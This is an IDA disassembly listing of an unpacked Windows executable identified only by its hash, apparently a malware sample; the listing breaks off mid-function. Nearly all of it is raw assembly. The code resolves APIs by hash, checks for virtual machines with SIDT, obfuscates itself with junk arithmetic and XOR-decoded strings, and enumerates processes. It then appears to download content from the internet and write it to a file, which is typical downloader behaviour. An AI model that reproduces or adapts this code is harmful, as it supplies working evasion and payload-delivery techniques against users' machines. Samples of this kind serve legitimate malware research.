;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 07F9F6989990FCB09591F96951554354
; File Name : u:\work\07f9f6989990fcb09591f96951554354_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102E+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
lea ecx, [esi-1]
test ecx, ecx
push 2
pop eax
jz short loc_401015
loc_40100F: ; CODE XREF: sub_401000+13�j
imul eax, eax
dec ecx
jnz short loc_40100F
loc_401015: ; CODE XREF: sub_401000+D�j
movzx edx, [esp+4+arg_0]
push 8
pop ecx
sub ecx, esi
dec eax
shl eax, cl
and eax, edx
sar eax, cl
mov ecx, esi
shl edx, cl
pop esi
or eax, edx
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102E proc near ; CODE XREF: sub_401117:loc_401165�p
; sub_4014C4+2A7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_401050: ; CODE XREF: sub_40102E+3A�j
movzx eax, byte ptr [ebx]
push 6
push eax
call sub_401000
xor al, 21h
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_401050
pop ebx
loc_40106B: ; CODE XREF: sub_40102E+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102E endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011C9�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_401E48+24A�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102E+F�p
; sub_4014C4+11A�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_4027EE+1A6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_4027EE+9�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+5A�p
; sub_401330+63�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_405104
push esi
push edi
add eax, 0FFFFFFD7h
mov edi, 0A4h
cmp eax, edi
ja short loc_401135
inc dword_405104
loc_401135: ; CODE XREF: sub_401117+16�j
mov eax, [ebp+arg_0]
dec eax
jz loc_4011C9
dec eax
jz short loc_4011BA
dec eax
jz short loc_4011AB
dec eax
jz short loc_40119C
dec eax
jz short loc_40118D
dec eax
jz short loc_40117E
dec eax
jz short loc_401158
loc_401151: ; CODE XREF: sub_401117+1FC�j
xor eax, eax
jmp loc_401327
; ---------------------------------------------------------------------------
loc_401158: ; CODE XREF: sub_401117+38�j
push 0Bh
mov esi, offset dword_405208
push esi
push offset dword_40405C
loc_401165: ; CODE XREF: sub_401117+74�j
; sub_401117+83�j ...
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40117E: ; CODE XREF: sub_401117+35�j
push 0Ch
mov esi, offset dword_405208
push esi
push offset dword_40404C
jmp short loc_401165
; ---------------------------------------------------------------------------
loc_40118D: ; CODE XREF: sub_401117+32�j
push 9
mov esi, offset dword_405208
push esi
push offset dword_404040
jmp short loc_401165
; ---------------------------------------------------------------------------
loc_40119C: ; CODE XREF: sub_401117+2F�j
push 0Bh
mov esi, offset dword_405208
push esi
push offset dword_404034
jmp short loc_401165
; ---------------------------------------------------------------------------
loc_4011AB: ; CODE XREF: sub_401117+2C�j
push 0Ah
mov esi, offset dword_405208
push esi
push offset dword_404028
jmp short loc_401165
; ---------------------------------------------------------------------------
loc_4011BA: ; CODE XREF: sub_401117+29�j
push 0Bh
mov esi, offset dword_405208
push esi
push offset dword_40401C
jmp short loc_401165
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_401117+22�j
call sub_401072
loc_4011CE: ; CODE XREF: sub_401117+65�j
push 4
mov [ebp+arg_0], eax
pop eax
push 0FFFFFFB1h
pop ecx
loc_4011D7: ; CODE XREF: sub_401117+D5�j
cmp ecx, 96h
ja short loc_4011E1
inc eax
inc ecx
loc_4011E1: ; CODE XREF: sub_401117+C6�j
add eax, 2Bh
add ecx, 2Bh
cmp eax, 0BCh
jl short loc_4011D7
cmp eax, 2
mov ecx, [ebp+arg_0]
mov dword_405104, eax
mov edx, [ecx+3Ch]
lea ecx, [edx+ecx+18h]
jl short loc_401208
inc eax
mov dword_405104, eax
loc_401208: ; CODE XREF: sub_401117+E9�j
cmp eax, 0C0h
jle short loc_401217
push 18h
pop eax
mov dword_405104, eax
loc_401217: ; CODE XREF: sub_401117+F6�j
mov edx, [ecx+60h]
add edx, [ebp+arg_0]
lea ecx, [eax-5Fh]
cmp ecx, 7Ah
ja short loc_40122B
inc eax
mov dword_405104, eax
loc_40122B: ; CODE XREF: sub_401117+10C�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_401242
movzx ecx, word ptr [ebp+arg_4]
sub ecx, [edx+10h]
jmp loc_401319
; ---------------------------------------------------------------------------
loc_401242: ; CODE XREF: sub_401117+11D�j
push 3Ah
pop eax
push 25h
pop ecx
loc_401248: ; CODE XREF: sub_401117+143�j
cmp ecx, 0C8h
ja short loc_401252
inc eax
inc ecx
loc_401252: ; CODE XREF: sub_401117+137�j
add eax, 22h
add ecx, 22h
cmp eax, edi
jl short loc_401248
mov dword_405104, eax
mov edi, [edx+24h]
mov esi, [edx+20h]
add edi, [ebp+arg_0]
add esi, [ebp+arg_0]
cmp eax, 78h
mov [ebp+var_8], edi
jge short loc_40127B
inc eax
mov dword_405104, eax
loc_40127B: ; CODE XREF: sub_401117+15C�j
and [ebp+var_4], 0
cmp dword ptr [edx+18h], 0
push ebx
jbe short loc_4012E7
loc_401286: ; CODE XREF: sub_401117+1CE�j
mov ecx, [esi]
add ecx, [ebp+arg_0]
xor ebx, ebx
cmp [ecx], bl
jz short loc_4012BE
loc_401291: ; CODE XREF: sub_401117+1A2�j
cmp eax, 36h
jge short loc_40129C
inc eax
mov dword_405104, eax
loc_40129C: ; CODE XREF: sub_401117+17D�j
movsx edi, byte ptr [ecx]
rol ebx, 7
xor ebx, edi
lea edi, [eax-47h]
inc ecx
cmp edi, 8Ah
ja short loc_4012B6
inc eax
mov dword_405104, eax
loc_4012B6: ; CODE XREF: sub_401117+197�j
cmp byte ptr [ecx], 0
jnz short loc_401291
mov edi, [ebp+var_8]
loc_4012BE: ; CODE XREF: sub_401117+178�j
lea ecx, [eax-0Fh]
cmp ecx, 0E1h
ja short loc_4012CF
inc eax
mov dword_405104, eax
loc_4012CF: ; CODE XREF: sub_401117+1B0�j
cmp ebx, [ebp+arg_4]
jz short loc_40132B
inc [ebp+var_4]
mov ecx, [ebp+var_4]
add esi, 4
inc edi
inc edi
cmp ecx, [edx+18h]
mov [ebp+var_8], edi
jb short loc_401286
loc_4012E7: ; CODE XREF: sub_401117+16D�j
mov ecx, [ebp+arg_0]
loc_4012EA: ; CODE XREF: sub_401117+217�j
push 59h
pop eax
push 49h
pop esi
pop ebx
loc_4012F1: ; CODE XREF: sub_401117+1EF�j
cmp esi, 0DBh
ja short loc_4012FB
inc eax
inc esi
loc_4012FB: ; CODE XREF: sub_401117+1E0�j
add eax, 0Dh
add esi, 0Dh
cmp eax, 0AAh
jl short loc_4012F1
mov dword_405104, eax
mov eax, [ebp+var_4]
cmp eax, [edx+18h]
jz loc_401151
loc_401319: ; CODE XREF: sub_401117+126�j
mov eax, [edx+1Ch]
lea eax, [eax+ecx*4]
mov ecx, [ebp+arg_0]
mov eax, [eax+ecx]
add eax, ecx
loc_401327: ; CODE XREF: sub_401117+3C�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40132B: ; CODE XREF: sub_401117+1BB�j
movzx ecx, word ptr [edi]
jmp short loc_4012EA
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401330 proc near ; CODE XREF: sub_401E48+257�p
; sub_402CF4+15�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
mov eax, dword_405104
lea ecx, [eax-5]
sub esp, 94h
cmp ecx, 0E5h
ja short loc_40134F
inc eax
mov dword_405104, eax
loc_40134F: ; CODE XREF: sub_401330+17�j
cmp byte_405409, 0
jz short loc_40135F
mov al, byte_405408
leave
retn
; ---------------------------------------------------------------------------
loc_40135F: ; CODE XREF: sub_401330+26�j
cmp eax, 0Bh
mov byte_405409, 1
mov [ebp+var_94], 94h
jl short loc_40137B
inc eax
mov dword_405104, eax
loc_40137B: ; CODE XREF: sub_401330+43�j
cmp eax, 0B3h
jle short loc_40138C
mov dword_405104, 17h
loc_40138C: ; CODE XREF: sub_401330+50�j
push 9C480E24h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
setz al
cmp dword_405104, 7Dh
mov byte_405408, al
jge short locret_4013C1
inc dword_405104
locret_4013C1: ; CODE XREF: sub_401330+89�j
leave
retn
sub_401330 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013C3 proc near ; CODE XREF: sub_4014C4+301�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_405104
add eax, 0FFFFFFBDh
cmp eax, 0ABh
ja short loc_4013DC
inc dword_405104
loc_4013DC: ; CODE XREF: sub_4013C3+11�j
push ebx
push esi
push edi
xor edi, edi
inc edi
cmp [ebp+arg_0], 0
jz loc_4014AC
mov esi, 99A4299Dh
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push edi
push edi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_401444
push 0FDC94385h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov eax, dword_405104
add eax, 0FFFFFFAFh
cmp eax, 78h
ja short loc_40142E
inc dword_405104
loc_40142E: ; CODE XREF: sub_4013C3+63�j
mov esi, [ebp+var_4]
push 9E6FA842h
push edi
call sub_401117
pop ecx
pop ecx
push esi
push ebx
call eax
jmp short loc_4014AF
; ---------------------------------------------------------------------------
loc_401444: ; CODE XREF: sub_4013C3+42�j
push 25h
pop eax
push 0FFFFFFCCh
pop ecx
loc_40144A: ; CODE XREF: sub_4013C3+99�j
cmp ecx, 74h
ja short loc_401451
inc eax
inc ecx
loc_401451: ; CODE XREF: sub_4013C3+8A�j
add eax, 2Ah
add ecx, 2Ah
cmp eax, 87h
jl short loc_40144A
push esi
push edi
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push edi
call eax
cmp dword_405104, 8Eh
mov ebx, eax
jge short loc_401488
inc dword_405104
loc_401488: ; CODE XREF: sub_4013C3+BD�j
push 9E6FA842h
push edi
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_4014AF
; ---------------------------------------------------------------------------
loc_4014AC: ; CODE XREF: sub_4013C3+23�j
mov ebx, [ebp+arg_0]
loc_4014AF: ; CODE XREF: sub_4013C3+7F�j
; sub_4013C3+E7�j
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_4013C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014C4 proc near ; CODE XREF: sub_401E48+262�p
; sub_402CF4+E2�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_403050
mov eax, dword_405104
add eax, 0FFFFFFF9h
cmp eax, 0DFh
ja short loc_4014E6
inc dword_405104
loc_4014E6: ; CODE XREF: sub_4014C4+1A�j
push 774393E8h
push 1
call sub_401117
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
mov eax, dword_405104
add eax, 0FFFFFFB8h
cmp eax, 8Fh
ja short loc_401519
inc dword_405104
loc_401519: ; CODE XREF: sub_4014C4+4D�j
push ebx
push esi
push edi
push 8AC4909Bh
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_401862
cmp dword_405104, 0Ch
jl short loc_401553
inc dword_405104
loc_401553: ; CODE XREF: sub_4014C4+87�j
cmp dword_405104, 9Eh
jle short loc_401569
mov dword_405104, 14h
loc_401569: ; CODE XREF: sub_4014C4+99�j
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
jbe loc_401862
mov edi, offset dword_405208
loc_40157F: ; CODE XREF: sub_4014C4+398�j
mov ebx, [ebp+var_4]
lea ebx, [ebp+ebx*4+var_1318]
mov esi, [ebx]
test esi, esi
jz loc_401850
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push 5Fh
mov [ebp+var_8], eax
pop eax
push 59h
pop ecx
loc_4015B5: ; CODE XREF: sub_4014C4+106�j
cmp ecx, 0EFh
ja short loc_4015BF
inc eax
inc ecx
loc_4015BF: ; CODE XREF: sub_4014C4+F7�j
add eax, 2Fh
add ecx, 2Fh
cmp eax, 0AAh
jl short loc_4015B5
push 100h
mov dword_405104, eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_40183D
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_40183D
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
push 4Fh
pop eax
push 3Dh
pop ecx
loc_40163D: ; CODE XREF: sub_4014C4+18E�j
cmp ecx, 0E1h
ja short loc_401647
inc eax
inc ecx
loc_401647: ; CODE XREF: sub_4014C4+17F�j
add eax, 0Fh
add ecx, 0Fh
cmp eax, 0BFh
jl short loc_40163D
mov esi, dword_404008
mov dword_405104, eax
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_40183D
cmp [ebp+var_117], 3Ah
jnz loc_40183D
cmp [ebp+var_116], 5Ch
jnz loc_40183D
cmp dword_405104, 0Fh
jl short loc_401699
inc dword_405104
loc_401699: ; CODE XREF: sub_4014C4+1CD�j
cmp dword_405104, 0B6h
jle short loc_4016AF
mov dword_405104, 26h
loc_4016AF: ; CODE XREF: sub_4014C4+1DF�j
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_4016BD
; ---------------------------------------------------------------------------
loc_4016BC: ; CODE XREF: sub_4014C4+201�j
dec esi
loc_4016BD: ; CODE XREF: sub_4014C4+1F6�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_4016BC
push 13h
pop eax
push 0Eh
pop ecx
loc_4016CD: ; CODE XREF: sub_4014C4+21C�j
cmp ecx, 0DDh
ja short loc_4016D7
inc eax
inc ecx
loc_4016D7: ; CODE XREF: sub_4014C4+20F�j
add eax, 14h
add ecx, 14h
cmp eax, 79h
jl short loc_4016CD
push [ebp+arg_0]
mov dword_405104, eax
call dword_404008 ; lstrlen
test eax, eax
jle short loc_401741
cmp dword_405104, 0Dh
jl short loc_401703
inc dword_405104
loc_401703: ; CODE XREF: sub_4014C4+237�j
cmp dword_405104, 9Bh
jle short loc_401719
mov dword_405104, 25h
loc_401719: ; CODE XREF: sub_4014C4+249�j
push [ebp+arg_0]
lea eax, [ebp+esi+var_117]
push eax
call dword_404004 ; lstrcmpi
test eax, eax
jnz loc_40183D
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_401874
; ---------------------------------------------------------------------------
loc_401741: ; CODE XREF: sub_4014C4+22E�j
push 4Fh
pop eax
push 2Ch
pop ecx
loc_401747: ; CODE XREF: sub_4014C4+298�j
cmp ecx, 0C1h
ja short loc_401751
inc eax
inc ecx
loc_401751: ; CODE XREF: sub_4014C4+289�j
add eax, 15h
add ecx, 15h
cmp eax, 9Fh
jl short loc_401747
push 0Bh
push edi
push offset dword_40406C
mov dword_405104, eax
call sub_40102E
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_40183D
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_404004 ; lstrcmpi
test eax, eax
jz loc_40183D
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_404004 ; lstrcmpi
test eax, eax
jz short loc_40183D
push dword ptr [ebx]
call sub_4013C3
pop ecx
push 1Ch
pop eax
push 0FFFFFFD2h
pop ecx
loc_4017D1: ; CODE XREF: sub_4014C4+322�j
cmp ecx, 84h
ja short loc_4017DB
inc eax
inc ecx
loc_4017DB: ; CODE XREF: sub_4014C4+313�j
add eax, 24h
add ecx, 24h
cmp eax, 0C5h
jl short loc_4017D1
mov dword_405104, eax
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_404000 ; lstrcpy
push 1
push edi
push offset dword_404068
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40400C ; lstrcat
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_40183D: ; CODE XREF: sub_4014C4+125�j
; sub_4014C4+14A�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_401850: ; CODE XREF: sub_4014C4+C9�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_40157F
loc_401862: ; CODE XREF: sub_4014C4+7A�j
; sub_4014C4+B0�j
cmp dword_405104, 0B2h
jge short loc_401874
inc dword_405104
loc_401874: ; CODE XREF: sub_4014C4+278�j
; sub_4014C4+3A8�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401879 proc near ; CODE XREF: sub_401E48+2D6�p
; sub_401E48+35E�p ...
var_878 = byte ptr -878h
var_478 = byte ptr -478h
var_78 = dword ptr -78h
var_74 = byte ptr -74h
var_34 = byte ptr -34h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 878h
mov eax, dword_405104
push ebx
xor ebx, ebx
add eax, 0FFFFFFDAh
cmp eax, 0C9h
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
ja short loc_4018A7
inc dword_405104
loc_4018A7: ; CODE XREF: sub_401879+26�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_878]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_878]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_405208
push edi
push offset dword_404078
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_878]
push eax
call dword_40400C ; lstrcat
mov eax, dword_405104
add eax, 0FFFFFF9Ch
cmp eax, 6Ah
ja short loc_401912
inc dword_405104
loc_401912: ; CODE XREF: sub_401879+91�j
mov [ebp+var_8], ebx
loc_401915: ; CODE XREF: sub_401879+500�j
push esi
lea eax, [ebp+var_478]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+arg_C], bl
mov [ebp+var_18], esi
lea eax, [ebp+var_478]
jz short loc_40195E
cmp [ebp+var_8], ebx
jnz short loc_401940
push offset dword_405108
jmp short loc_401945
; ---------------------------------------------------------------------------
loc_401940: ; CODE XREF: sub_401879+BE�j
push offset dword_405308
loc_401945: ; CODE XREF: sub_401879+C5�j
push eax
call dword_404000 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_478]
push eax
call dword_40400C ; lstrcat
jmp short loc_401981
; ---------------------------------------------------------------------------
loc_40195E: ; CODE XREF: sub_401879+B9�j
push offset dword_405308
push eax
call dword_404000 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_478]
push eax
call dword_40400C ; lstrcat
mov [ebp+var_8], 1
loc_401981: ; CODE XREF: sub_401879+E3�j
mov eax, dword_405104
add eax, 0FFFFFFC7h
cmp eax, 0B6h
ja short loc_401996
inc dword_405104
loc_401996: ; CODE XREF: sub_401879+115�j
push 8593DD7h
push 4
pop edi
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_878]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_10], eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_478]
push ecx
push [ebp+var_10]
call eax
push 2Ch
mov [ebp+var_C], eax
pop eax
push 0Ah
pop ecx
loc_4019DC: ; CODE XREF: sub_401879+178�j
cmp ecx, 0B7h
ja short loc_4019E6
inc eax
inc ecx
loc_4019E6: ; CODE XREF: sub_401879+169�j
add eax, 1Bh
add ecx, 1Bh
cmp eax, 9Ch
jl short loc_4019DC
push 1AD09C78h
push edi
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_10]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_10]
call eax
cmp dword_405104, 7
jl short loc_401A39
inc dword_405104
loc_401A39: ; CODE XREF: sub_401879+1B8�j
cmp dword_405104, 0A4h
jle short loc_401A4F
mov dword_405104, 1Ch
loc_401A4F: ; CODE XREF: sub_401879+1CA�j
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_10]
call eax
cmp dword_405104, 10h
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
jl short loc_401A7D
inc dword_405104
loc_401A7D: ; CODE XREF: sub_401879+1FC�j
cmp dword_405104, 0E4h
jle short loc_401A93
mov dword_405104, 19h
loc_401A93: ; CODE XREF: sub_401879+20E�j
push 2F5CE027h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_C]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401C49
mov eax, dword_405104
add eax, 0FFFFFFF0h
cmp eax, 0D2h
ja short loc_401ADD
inc dword_405104
loc_401ADD: ; CODE XREF: sub_401879+25C�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
mov [ebp+var_1C], eax
mov eax, dword_405104
add eax, 0FFFFFFCBh
cmp eax, 0B5h
mov [ebp+var_4], ebx
ja short loc_401B1A
inc dword_405104
loc_401B1A: ; CODE XREF: sub_401879+299�j
push esi
lea eax, [ebp+var_478]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
cmp dword_405104, 58h
mov [ebp+var_18], esi
jge short loc_401B3D
inc dword_405104
loc_401B3D: ; CODE XREF: sub_401879+2BC�j
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_478]
push ecx
push [ebp+var_C]
call eax
mov ecx, dword_405104
test eax, eax
setnz al
add ecx, 0FFFFFFACh
cmp ecx, 74h
ja loc_401C03
inc dword_405104
jmp loc_401C03
; ---------------------------------------------------------------------------
loc_401B7D: ; CODE XREF: sub_401879+38D�j
cmp al, bl
jz loc_401C0C
mov edi, [ebp+var_4]
push 0F3FD1C3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_24]
push ecx
push edi
lea ecx, [ebp+var_478]
push ecx
push [ebp+var_1C]
call eax
push esi
lea eax, [ebp+var_478]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
push 2
pop eax
push 0FFFFFFF2h
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
pop ecx
loc_401BC5: ; CODE XREF: sub_401879+35F�j
cmp ecx, 0E2h
ja short loc_401BCF
inc eax
inc ecx
loc_401BCF: ; CODE XREF: sub_401879+352�j
add eax, 19h
add ecx, 19h
cmp eax, 76h
jl short loc_401BC5
push 1A212962h
push 4
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_478]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
loc_401C03: ; CODE XREF: sub_401879+2F3�j
; sub_401879+2FF�j
cmp [ebp+var_4], ebx
ja loc_401B7D
loc_401C0C: ; CODE XREF: sub_401879+306�j
cmp dword_405104, 5
jl short loc_401C1B
inc dword_405104
loc_401C1B: ; CODE XREF: sub_401879+39A�j
cmp dword_405104, 0D3h
jle short loc_401C31
mov dword_405104, 15h
loc_401C31: ; CODE XREF: sub_401879+3AC�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_1C]
call eax
